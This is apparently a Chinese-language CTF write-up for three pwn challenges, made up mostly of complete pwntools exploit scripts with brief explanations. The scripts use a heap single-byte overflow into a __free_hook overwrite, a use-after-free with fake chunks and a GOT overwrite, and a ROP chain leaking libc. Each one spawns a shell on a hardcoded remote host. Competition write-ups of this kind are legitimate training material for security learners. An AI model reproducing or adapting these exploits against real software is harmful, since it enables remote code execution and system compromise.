星期六刚打完,一共三个pwn,两道难度一般,最后一天的pwn基本凭手速。整理下思路跟exp

heap

堆,单字节溢出,修改头重叠,泄露libc+修改__free_hook

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('heap')
def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
p = process('./heap')

else:
p = remote(ip,port)
def add(size,data):
p.sendlineafter('Choice :','1')
p.sendlineafter('size: ',str(size))
p.sendafter('data: ',str(data))
def delete(index):
p.sendlineafter('Choice :','2')
p.sendlineafter('delete: ',str(index))
def show():
p.sendlineafter('Choice :','3')
add(0x28,'A'*0x28)
add(0x28,'A')
add(0x88,'b')
add(0x18,'A')
add(0x18,'a')
add(0x18,'/bin/sh\x00')
#------------
add(0x18,'a')
add(0x68,'p')
add(0x18,'/bin/sh')
add(0x18,'/bin/sh')
delete(5)
add(0x18,'a'*0x18+'\x91')
delete(6)
delete(7)
#------------
delete(0)
add(0x28,'A'*0x28+'\xe1')
delete(1)
add(0xd8,'X'*8)
show()
p.recvuntil('XXXXXXXX')
main_arena=u64(p.recv(6).ljust(8,'\x00'))
_libc_start_main=main_arena-(0x7f4b939f1b78-0x7f4b9364d740)
print "_libc_start_main=>",hex(_libc_start_main)

libc=LibcSearcher('__libc_start_main',_libc_start_main)
libcbase_addr=_libc_start_main-libc.dump('__libc_start_main')
print "libcbase_addr=>",hex(libcbase_addr)
free_hook_addr=libcbase_addr+libc.dump('__free_hook')
system_addr=libcbase_addr+libc.dump('system')

payload=p64(0)*3+p64(0x71)+p64(free_hook_addr-0x33)
add(0x88,payload)
delete(2)
payload=p64(0)*5+p64(0x91)+p64(0)+p64(free_hook_addr-0x40)
add(0x88,p64(0)*11+p64(0x21)+p64(0)*3+p64(0x21))
delete(2)
add(0x88,'--')
delete(0)
add(0x28,'A'*0x28+'\x91')
delete(1)
delete(2)
add(0x88,payload)
add(0x88,'1')
add(0x68,'111')
payload=p64(0)*4+'\x00'*3+p64(system_addr)
add(0x68,payload)
delete(9)
#gdb.attach(p)
p.interactive()
if __name__ == '__main__':
pwn('120.55.43.255',12240,0)

Internal Chat System

我感觉这道挺难的,漏洞点在于在登录进去后,可以free自己,free后还可以修改自己堆块的值,然后就可以泄露地址+堆地址,利用description选项来伪造堆块,
将free后的堆块指向我们伪造的堆块,伪造堆块记得伪造fd跟bk指针,不然通不过unsortedbin监测。

这样我们就能操控指向堆块的指针,我们将指针改为got表,可实现getshell

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('inter')

def pwn(ip,port,debug):
global sh
global lib
if(debug == 1):
p = process('./inter')

else:
p = remote(ip,port)
def add(size,name,age,description):
p.sendlineafter('choice:','2')
p.sendlineafter('name size:',str(size))
p.sendlineafter('your name:',name)
p.sendlineafter('age:',str(age))
p.sendlineafter('description:',description)
def login(name):
p.sendlineafter('choice:','1')
p.sendlineafter('name:',name)
def sendfriend(name,title,content):
p.sendlineafter('choice:','4')
p.sendlineafter('send a msg to:',name)
p.sendlineafter('message title:',title)
p.sendlineafter('Input your content:',content)
def add_delete(name,aorb):
p.sendlineafter('choice:','3')
p.sendlineafter("friend's name:",name)
p.sendlineafter('friend?(a/d)',aorb)
def view_fi():
p.sendlineafter('choice:','1')
def updete(name,age,description):
p.sendlineafter('choice:','2')
p.sendlineafter('your name:',name)
p.sendlineafter('age:',str(age))
p.sendlineafter('description:',description)
def logout():
p.sendlineafter('choice:','6')
add(0x68,'weeeee',30,'a'*0xf8+'ABCDEEEE')
payload='\x00'*0xb8+p64(0x131)
add(0x68,'weei',30,payload)
payload='\x00'*0xb8+p64(0x131)
add(0x68,'/bin/sh\x00',30,payload)
login('weeeee')
add_delete('weeeee','a')
add_delete('weeeee','d')
view_fi()
p.recvuntil('Age:')
_libc_start_addr=int(p.recv(12),16)-(0x7fe5cdf8cb78-0x7fe5cdbe8740)
print "_libc_start_addr=>",hex(_libc_start_addr)
p.recvuntil('ABCDEEEE')
heap_addr=u64(p.recv(4).ljust(8,'\x00'))-(0x0000000002401680-0x23ff000)
print "heap_addr=>",hex(heap_addr)
libc=LibcSearcher('__libc_start_main',_libc_start_addr)
libcbase_addr=_libc_start_addr-libc.dump('__libc_start_main')
system_addr=libcbase_addr+libc.dump('system')
atoi_addr=libcbase_addr+libc.dump('atoi')
updete('aa',heap_addr+0x200,'xxx')
logout()
login('weei')
payload='\x00'*0xb8+p64(0x131)+p64(heap_addr)+p64(_libc_start_addr+(0x7fe5cdf8cb78-0x7fe5cdbe8740))
updete('weei',30,payload)
logout()
add(0x68,p64(0x603068),30,'a')
payload='hhh\x00\x00\x00\x00\x00'+p64(0)*10+p64(0x131)+p64(0x603068)
add(0x128,payload,30,'f')
login(p64(atoi_addr))
updete(p64(system_addr),30,'111')
p.sendlineafter('choice:','/bin/sh\x00')
gdb.attach(p)

p.interactive()
if __name__ == '__main__':
pwn('120.55.43.255',19812,1)

service_Refueling_System

白给,凭手速(我是没赶上热乎的)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('self')
_libc_start_main=elf.got['puts']
puts_plt=elf.plt['puts']
main_addr=0x0400EAA
p = 0
def pwn(ip,port,debug):
global p
if(debug == 1):
p = process('./self')

else:
p = remote(ip,port)
#sleep(5)
#gdb.attach(p)
p.sendlineafter('Do you want to refuel?(y/n)\n','y')
p.recvuntil('Plz input your Gas Card ID :\n')
payload="A"*(0x20-8)+p32(26214)+p32(9011)+"A"*8+p64(0x400fb3)+p64(_libc_start_main)+p64(puts_plt)+p64(main_addr)
p.sendline(payload)
p.sendlineafter('How mang gas do you want?(L)\n','L')
p.recvuntil('Finish! your car is full of gas\n')
pause()
#print "recv=>",p.recv()

puts_addr=u64(p.recv()[4:10].ljust(8,'\x00'))
print "puts_addr=>",hex(puts_addr)
libc=LibcSearcher('puts',puts_addr)
libcbase_addr=puts_addr-libc.dump('puts')
system_addr=libcbase_addr+libc.dump('system')
binsh_addr=libcbase_addr+libc.dump('str_bin_sh')
p.sendlineafter('Do you want to refuel?(y/n)\n','y')
p.recvuntil('Plz input your Gas Card ID :\n')
payload="A"*(0x20-8)+p32(26214)+p32(9011)+"A"*8+p64(0x400fb3)+p64(binsh_addr)+p64(system_addr)+p64(main_addr)
p.sendline(payload)
p.sendlineafter('How mang gas do you want?(L)\n','L')
p.recvuntil(' Finish! your car is full of gas\n')
p.interactive()
if __name__ == '__main__':
pwn('120.55.43.255',23810,0)